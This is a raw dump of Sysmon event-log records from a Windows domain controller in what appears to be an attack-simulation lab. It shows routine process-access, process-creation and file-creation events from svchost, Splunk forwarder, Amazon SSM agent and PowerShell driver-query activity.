10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.739{266CAFBE-6482-6064-6B00-00000000AE01}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:06.737{266CAFBE-6482-6064-6A00-00000000AE01}2504\PSHost.132616656666663960.2504.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.721{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_5tdv1jfk.3kb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.721{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_qjooq0lq.x2n.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.705{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_qjooq0lq.x2n.ps12021-03-31 12:01:06.705 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.669{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.666{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.666{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.666{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.643{266CAFBE-6482-6064-6500-00000000AE01}3228NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.627{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
